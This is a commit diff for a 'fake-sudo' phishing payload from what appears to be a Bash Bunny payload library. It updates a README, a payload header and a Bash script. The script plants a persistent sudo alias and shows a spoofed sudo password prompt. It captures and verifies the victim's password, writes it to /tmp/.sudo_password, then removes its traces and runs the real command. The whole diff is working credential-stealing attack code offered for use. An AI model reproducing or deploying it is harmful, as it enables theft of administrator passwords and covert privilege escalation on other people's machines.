fake-sudo - Improvements and corrections (#528)

* Update README.md * Update sudo-phishing.sh * Update sudo-phishing.sh * Delete payloads/library/phishing/fake-sudo directory * Add files via upload
2022-05-29 17:21:12 -04:00 · 2022-05-29 17:21:12 -04:00 · 80573a03ab
parent 49c8edf636
commit 80573a03ab
3 changed files with 20 additions and 17 deletions
--- a/payloads/library/phishing/fake-sudo/README.md
+++ b/payloads/library/phishing/fake-sudo/README.md
@ -2,7 +2,7 @@

 - Title:         Fake sudo
 - Author:        TW-D
- Version:       1.0
+- Version:       1.1
 - Target:        Linux
 - Category:      Phishing

@ -12,7 +12,7 @@
 2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
 3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
 - __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
- __But__ this behavior can be changed in line 21 of the "sudo-phishing.sh" file.
+- __But__ this behavior can be changed in line 26 of the "sudo-phishing.sh" file.
 4) The spoofing program deletes the "sudo" alias. Then it deletes itself.

 ## Configuration
@ -29,7 +29,6 @@ readonly BB_LABEL="BashBunny"
 From "sudo-phishing.sh" change the values of the following constants if necessary :
 ```bash

-readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
 readonly MAXIMUM_ATTEMPTS=3
 readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"

@ -40,9 +39,8 @@ From "sudo-phishing.sh", change the payload if you wish :
 ##
 # <YOUR-PAYLOAD>
 ##
-/usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
+/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
 ##
 # </YOUR-PAYLOAD>
 ##
 ```
-
--- a/payloads/library/phishing/fake-sudo/payload.txt
+++ b/payloads/library/phishing/fake-sudo/payload.txt
@ -7,7 +7,7 @@
 #                   command by defining an persistent alias.
 #
 # Author:           TW-D
-# Version:          1.0
+# Version:          1.1
 # Category:         Phishing
 # Target:           Linux
 # Attackmodes:      HID and STORAGE
--- a/payloads/library/phishing/fake-sudo/sudo-phishing.sh
+++ b/payloads/library/phishing/fake-sudo/sudo-phishing.sh
@ -6,36 +6,41 @@
 # of the "sudo" command.
 #

-readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
+if [ -z "${SUDO_PROMPT}" ]; then
+    readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
+else
+    readonly INPUT_MESSAGE="${SUDO_PROMPT}"
+fi
+
 readonly MAXIMUM_ATTEMPTS=3
 readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"

 attempts() {
-    /usr/bin/echo -n "${INPUT_MESSAGE}"
+    /bin/echo -n "${INPUT_MESSAGE}"
    read -r -s sudo_password
-    /usr/bin/echo ""
-    if /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S /usr/bin/true 2> /dev/null; then
+    /bin/echo ""
+    if ( /bin/echo "${sudo_password}" | /usr/bin/sudo -S /bin/true > /dev/null 2>&1 ); then
        ##
        # <YOUR-PAYLOAD>
        ##
-        /usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
+        /bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
        ##
        # </YOUR-PAYLOAD>
        ##
-        /usr/bin/rm ~/.sudo_phishing.sh
+        /bin/rm ~/.sudo_phishing.sh
        /usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak
-        /usr/bin/mv ~/.bash_aliases_bak ~/.bash_aliases
-        /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
+        /bin/mv ~/.bash_aliases_bak ~/.bash_aliases
+        /bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
        $BASH
        exit 0
    fi
 }

-if (/usr/bin/sudo -n /usr/bin/true 2> /dev/null) || [ "${#}" -eq 0 ]; then
+if ( (/usr/bin/sudo -n /bin/true > /dev/null 2>&1) || [ "${#}" -eq 0 ] ); then
    /usr/bin/sudo "${@}"
 else
    for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
        attempts "${@}"
    done
-    /usr/bin/echo "${ERROR_MESSAGE}"
-fi
+    /bin/echo "${ERROR_MESSAGE}"
+fi